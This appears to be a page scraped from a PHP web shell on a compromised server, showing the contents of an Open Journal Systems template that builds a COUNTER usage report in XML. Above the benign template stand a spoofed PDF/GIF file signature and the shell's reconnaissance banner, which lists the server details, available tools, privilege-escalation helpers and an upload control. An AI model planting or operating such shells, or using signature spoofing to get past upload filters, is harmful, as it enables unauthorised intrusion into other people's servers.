%PDF-1.7 GIF89;
| Server IP : 104.20.45.2 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/reports/counter/templates/ |
Upload File : |
{**
* plugins/reports/counter/templates/reportxml.tpl
*
* Copyright (c) 2013-2019 Simon Fraser University
* Copyright (c) 2003-2019 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* COUNTER report XML
*}
{if $omitWrapper neq 'true'}
<?xml version="1.0" encoding="UTF-8"?>
<Reports xmlns="http://www.niso.org/schemas/counter"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.niso.org/schemas/counter http://www.niso.org/schemas/sushi/counter3_0.xsd">
{/if}
<Report xmlns="http://www.niso.org/schemas/counter" ID="JR1" Version="3" Title="Journal Report 1" Created="{$smarty.now|date_format:"%Y-%m-%dT%H:%M:%SZ"}">
<Vendor>
<Name>{$siteTitle|escape:"html"}</Name>
<ID>ID0</ID>
<WebSiteUrl>{$base_url|escape:"html"}</WebSiteUrl>
</Vendor>
<Customer>
<Name>{$reqUserName|escape:"html"}</Name>
<ID>{$reqUserId|escape:"html"}</ID>
{foreach from=$journalsArray key=journalkey item=journal}
<ReportItems>
<ItemIdentifier>
<Type>Print_ISSN</Type>
<Value>{$journal.printIssn|escape:"html"}</Value>
</ItemIdentifier>
<ItemIdentifier>
<Type>Online_ISSN</Type>
<Value>{$journal.onlineIssn|escape:"html"}</Value>
</ItemIdentifier>
<ItemPlatform>Open Journal Systems</ItemPlatform>
<ItemPublisher>{$journal.publisherInstitution|escape:"html"}</ItemPublisher>
<ItemName>{$journal.journalTitle|escape:"html"}</ItemName>
<ItemDataType>Journal</ItemDataType>
{foreach from=$journal.entries key=key item=requests}
<ItemPerformance>
<Period>
<Begin>{$requests.start}</Begin>
<End>{$requests.end}</End>
</Period>
<Category>Requests</Category>
{if $requests.count_total neq ''}<Instance>
<MetricType>ft_total</MetricType>
<Count>{$requests.count_total}</Count>
</Instance>{/if}
{if $requests.count_html neq ''}<Instance>
<MetricType>ft_html</MetricType>
<Count>{$requests.count_html}</Count>
</Instance>{/if}
{if $requests.count_pdf neq ''}<Instance>
<MetricType>ft_pdf</MetricType>
<Count>{$requests.count_pdf}</Count>
</Instance>{/if}
</ItemPerformance>
{/foreach}
</ReportItems>
{/foreach}
</Customer>
</Report>
{if $omitWrapper neq 'true'}
</Reports>
{/if}